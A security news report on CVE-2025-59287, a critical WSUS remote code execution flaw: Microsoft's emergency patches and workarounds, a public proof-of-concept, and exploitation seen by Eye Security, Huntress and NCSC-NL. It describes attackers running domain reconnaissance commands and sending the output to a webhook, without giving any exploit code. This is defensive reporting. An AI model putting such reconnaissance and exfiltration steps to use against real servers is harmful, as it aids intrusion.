Exploiting the Critical WSUS Vulnerability: Windows Server under Attack

A critical-severity vulnerability in Windows Server Update Service (WSUS) is now being exploited by attackers, with publicly available proof-of-concept exploit code already circulating.

Identified as CVE-2025-59287, this remote code execution (RCE) flaw specifically impacts Windows servers with the WSUS Server role enabled, allowing them to serve as an update source for other WSUS servers within the organization (a feature not enabled by default).

Threat actors can leverage this vulnerability in low-complexity remote attacks that do not require privileges or user interaction, enabling them to execute malicious code with SYSTEM privileges. In certain conditions, the security flaw could potentially facilitate wormable behavior between WSUS servers.

Microsoft took swift action by releasing out-of-band security updates for all affected Windows Server versions to address CVE-2025-59287 comprehensively. IT administrators are strongly advised to install these updates promptly.

For those unable to immediately deploy the emergency patches, Microsoft has also provided workarounds, such as disabling the WSUS Server role on vulnerable systems to eliminate the attack vector.

Cybersecurity firm HawkTrace Security recently disclosed a proof-of-concept exploit code for CVE-2025-59287 that does not enable arbitrary command execution.

Exploitation in the Wild

Eye Security, a Dutch cybersecurity firm, reported instances of scanning and exploitation attempts related to this vulnerability. Additionally, they confirmed that at least one of their customers’ systems had been compromised using a distinct exploit from the one shared by HawkTrace.

Despite WSUS servers typically not being exposed online, Eye Security identified approximately 2,500 instances globally, including 250 in Germany and around 100 in the Netherlands.

Huntress, an American cybersecurity company, also detected attacks targeting WSUS instances with default ports (8530/TCP and 8531/TCP) exposed online since October 23.

“We anticipate limited exploitation of CVE-2025-59287, as WSUS servers rarely expose ports 8530 and 8531. Across our partner base, we have identified approximately 25 vulnerable hosts,” Huntress stated.

In the observed attacks, threat actors executed a PowerShell command for internal Windows domain reconnaissance, transmitting the data to a webhook. This data included outputs from commands such as ‘whoami,’ ‘net user /domain,’ and ‘ipconfig /all’.

The Netherlands National Cyber Security Centre (NCSC-NL) corroborated these findings and highlighted the heightened risk due to the availability of a PoC exploit for CVE-2025-59287.

“The NCSC has been informed by a trusted partner about exploitation of vulnerability CVE-2025-59287 on October 24, 2025,” the NCSC-NL cautioned in a Friday advisory.

Microsoft has categorized CVE-2025-59287 as “Exploitation More Likely,” indicating its attractiveness to attackers. However, the company has not yet confirmed active exploitation in an updated advisory.

Update October 24, 13:51 EDT: Additional details on active exploitation from Huntress Labs have been included.